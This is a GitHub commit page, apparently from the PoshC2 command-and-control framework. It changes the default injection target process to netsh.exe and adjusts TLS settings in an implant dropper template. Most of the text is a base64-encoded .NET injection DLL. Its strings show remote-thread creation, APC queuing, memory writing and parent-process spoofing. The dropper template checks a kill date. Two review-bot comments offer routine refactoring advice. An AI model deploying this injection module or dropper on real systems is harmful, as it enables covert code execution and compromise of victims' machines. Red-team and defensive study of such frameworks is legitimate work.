reset PS shellcode default back to netsh.exe
benpturner committed Apr 15, 2024
1 parent 2dc6e04 commit 64eb557
Showing 3 changed files with 9 additions and 5 deletions.
2 changes: 1 addition & 1 deletion poshc2/client/command_handlers/PSHandler.py
Expand Up @@ -666,7 +666,7 @@ def do_migrate(user, command, implant_id):
Examples:
migrate
migrate -procid 4444
migrate -procpath c:\\windows\\system32\\searchprotocolhost.exe -suspended -RtlCreateUserThread
migrate -procpath c:\\windows\\system32\\netsh.exe -suspended -RtlCreateUserThread
migrate -procpath c:\\windows\\system32\\svchost.exe -suspended
"""
params = re.compile("migrate", re.IGNORECASE)
6 changes: 3 additions & 3 deletions resources/modules/Inject-Shellcode.ps1
Expand Up @@ -62,7 +62,7 @@ if($ProcName){
if($ProcPath){
$ProcessPath = $ProcPath
} else {
$ProcessPath = "C:\Windows\system32\searchprotocolhost.exe"
$ProcessPath = "C:\Windows\system32\netsh.exe"
}
$p = "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AIAAUACQAFAAoABQALAAYADAAGAA0ABgAAAAAAAGtlcm5lbDMyAFRIUkVBRF9TRVRfQ09OVEVYVDIAY2JSZXNlcnZlZDIAbHBSZXNlcnZlZDIAVEhSRUFEX1NFVF9DT05URVhUMwBUSFJFQURfU0VUX0NPTlRFWFQ0ADxNb2R1bGU+AHBmbkFQQwBRdWV1ZVVzZXJBUEMARVhFQ1VURV9SRUFEAFNVU1BFTkRfUkVTVU1FAFRFUk1JTkFURQBJTVBFUlNPTkFURQBQQUdFX1JFQURXUklURQBFWEVDVVRFX1JFQURXUklURQBFWEVDVVRFAE1FTV9SRVNFUlZFAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFNFVF9USFJFQURfVE9LRU4AUFJPQ0VTU19JTkZPUk1BVElPTgBTRVRfSU5GT1JNQVRJT04AUVVFUllfSU5GT1JNQVRJT04ARElSRUNUX0lNUEVSU09OQVRJT04AVE9QX0RPV04AU1RBUlRVUElORk8ATEFSR0VfUEFHRVMAU0VDVVJJVFlfQVRUUklCVVRFUwBOT0FDQ0VTUwBUSFJFQURfQUxMX0FDQ0VTUwBQUk9DRVNTX0FMTF9BQ0NFU1MAUkVTRVQATUVNX0NPTU1JVABHRVRfQ09OVEVYVABUSFJFQURfU0VUX0NPTlRFWFQAU1RBUlRVUElORk9FWABkd1gAUkVBRE9OTFkARVhFQ1VURV9XUklURUNPUFkAZHdZAHZhbHVlX18AZHdEYXRhAGNiAG1zY29ybGliAHNyYwBscFRocm
VhZElkAGR3VGhyZWFkSWQAcGFyZW50UHJvY2Vzc0lkAGR3UHJvY2Vzc0lkAENsaWVudElkAEdldFByb2Nlc3NCeUlkAFN1c3BlbmRUaHJlYWQAUmVzdW1lVGhyZWFkAENyZWF0ZVJlbW90ZVRocmVhZABoVGhyZWFkAE9wZW5UaHJlYWQAUnRsQ3JlYXRlVXNlclRocmVhZABDcmVhdGVTdXNwZW5kZWQAbHBSZXNlcnZlZABnZXRfSGFuZGxlAEdldE1vZHVsZUhhbmRsZQBDbG9zZUhhbmRsZQBiSW5oZXJpdEhhbmRsZQBscFRpdGxlAGhNb2R1bGUAcHJvY05hbWUAbHBNb2R1bGVOYW1lAGxwQXBwbGljYXRpb25OYW1lAGxwQ29tbWFuZExpbmUAVmFsdWVUeXBlAGZsQWxsb2NhdGlvblR5cGUAVXBkYXRlUHJvY1RocmVhZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBscFZhbHVlAGxwUHJldmlvdXNWYWx1ZQBkd1hTaXplAGR3WVNpemUAZ2V0X1NpemUAY2JTaXplAENvbW1pdHRlZFN0YWNrU2l6ZQBNYXhpbXVtU3RhY2tTaXplAGR3U3RhY2tTaXplAGxwUmV0dXJuU2l6ZQBscFNpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBuTGVuZ3RoAEFsbG9jSEdsb2JhbABGcmVlSEdsb2JhbABNYXJzaGFsAGtlcm5lbDMyLmRsbABudGRsbC5kbGwASW5qZWN0LmRsbABtc3ZjcnQuZGxsAEZpbGwAU3lzdGVtAEVudW0AbHBOdW1iZXJPZkJ5dGVzV3JpdHRlbgBscFByb2Nlc3NJbmZvcm1hdGlvbgBwRGVzdGluYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGxwQnVmZmVyAFBQSURTcG9vZmVyAGxwUGFyYW1ldGVyAGhTdGRFcnJvcgAuY3RvcgBUaHJlYWRTZWN1cml0eURlc2NyaXB0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IAV3JpdGVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGJJbmhlcml0SGFuZGxlcwBscFRocmVhZEF0dHJpYnV0ZXMAbHBQcm9jZXNzQXR0cmlidXRlcwBkd0NyZWF0aW9uRmxhZ3MAZHdGbGFncwBkd1hDb3VudENoYXJzAGR3WUNvdW50Q2hhcnMAVGhyZWFkQWNjZXNzAGR3RGVzaXJlZEFjY2VzcwBDcmVhdGVQcm9jZX
NzAGhQcm9jZXNzAE9wZW5Qcm9jZXNzAEdldEN1cnJlbnRQcm9jZXNzAEdldFByb2NBZGRyZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRBZGRyZXNzAFplcm9CaXRzAGhPYmplY3QASW5qZWN0AGxwZmxPbGRQcm90ZWN0AGZsUHJvdGVjdABmbE5ld1Byb3RlY3QAb3BfRXhwbGljaXQAbHBFbnZpcm9ubWVudABkd0F0dHJpYnV0ZUNvdW50AGNvdW50AGRlc3QARGVsZXRlUHJvY1RocmVhZEF0dHJpYnV0ZUxpc3QASW5pdGlhbGl6ZVByb2NUaHJlYWRBdHRyaWJ1dGVMaXN0AGxwQXR0cmlidXRlTGlzdABoU3RkSW5wdXQAaFN0ZE91dHB1dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABWaXJ0dWFsUHJvdGVjdEV4AG1lbWNweQBSdGxGaWxsTWVtb3J5AFdyaXRlUHJvY2Vzc01lbW9yeQBscEN1cnJlbnREaXJlY3RvcnkAb3BfSW5lcXVhbGl0eQAAAAAAAAAAl9cKKe2YZEyEe4PXBRLUXwAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDwcIERwRIBgRKBEoGBgRHAQAAQgcAgYYBAABGBgFAAESVQgDIAAYAwAACAQAARgIBQACARgYBQACAhgYBAABARgCBgkCBggIt3pcVhk04IkEAQAAAAQCAAAABAgAAAAEEAAAAAQgAAAABEAAAAAEgAAAAAQAAQAABAACAAAE/w8fAAQAEAAABAAgAAAEBAAAAAT/Ax8ABAAACAAEAAAAIAQAAEAABAAAEAAEAAAgAAQABAAAAQIDBhEIAgYOAgYGAwYRJAMGESwDBhEwAwYRNBUACgIODhARKBARKAIJGA4QESAQERwKAAcCGAkYGBgYGAgABAIYCAgQGAQAAQIYBwADERwIDgIGAAMYGBgYCQAFAhgYCAkQCQgABRgYGBgJCQoABxgYGAkYGAkYCAAFAhgYGAgYBgADARgYBQYAAxgJAgkDAAAYBAABCRgEAAEYDgUAAhgYDgYAAxgYGBkOAAoIGBgCGBgYGBgQGBgRAAoCDg4YGAIJGA4QEQwQERAIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3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ABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAASQBuAGoAZQBjAHQAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAMAAAA6DoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$dl = [System.Convert]::FromBase64String($p)
Expand All @@ -75,9 +75,9 @@ echo ""

if ($x86.IsPresent -and (!$procpath)) {
if ($env:PROCESSOR_ARCHITECTURE -eq "x86"){
$ProcessPath = "C:\Windows\System32\searchprotocolhost.exe"
$ProcessPath = "C:\Windows\System32\netsh.exe"
} else {
$ProcessPath = "C:\Windows\Syswow64\searchprotocolhost.exe"
$ProcessPath = "C:\Windows\Syswow64\netsh.exe"
}
}

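Review bot: The default executable name is now spelled out in three places in this file — the `else` branch at the top of the first hunk and both branches of the `-x86` block in the second — and a fourth time in the `migrate` example in `PSHandler.py`, which is why a one-word change needed four edits. A single `$DefaultProc = "netsh.exe"` near the top of the script, with the three assignments becoming `$ProcessPath = "C:\Windows\system32\$DefaultProc"` and `$ProcessPath = "C:\Windows\Syswow64\$DefaultProc"`, would keep them from drifting apart again. The `-x86` block also appears to replace whatever the earlier `else` branch assigned when `-ProcPath` is absent; a short comment such as `# -x86 without -ProcPath overrides the default chosen above` would make that ordering explicit. Lines 69–74 between the two hunks, and the rest of the script after the second, are outside this view.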
6 changes: 5 additions & 1 deletion resources/payload-templates/dropper.ps1
Expand Up @@ -49,7 +49,11 @@ function Decrypt-String ($key,$enc){
}

function Get-Webclient ($Cookie) {
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]192 -bor [Net.SecurityProtocolType]768 -bor [Net.SecurityProtocolType]3072;
try {
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls12;
} catch {
echo "An error occurred: $_"
}
$d = (Get-Date -Format "yyyy-MM-dd");
$d = [datetime]::ParseExact($d,"yyyy-MM-dd",$null);
$k = [datetime]::ParseExact("#REPLACEKILLDATE#","yyyy-MM-dd",$null);
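Review bot: The new `try` body switches to named `SecurityProtocolType` members without recording why the assignment now needs a guard; the removed numeric casts (192, 768, 3072 are the values of `Tls`, `Tls11`, `Tls12`) are accepted even on a runtime whose enum lacks a member, whereas `::Tls11` or `::Tls12` presumably throws there, which seems to be what the `catch` is for. A one-line comment above the `try`, e.g. `# named members throw on older runtimes that lack them; on failure keep the runtime's default protocol set`, would make that explicit. Note that the `catch` only echoes and continues, so on such a runtime the subsequent request silently proceeds with whatever protocol set was already active, and the chosen set still enables TLS 1.0 and 1.1 alongside 1.2 — worth documenting as a deliberate compatibility choice if it is one. `Get-Webclient` continues past the end of the hunk.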
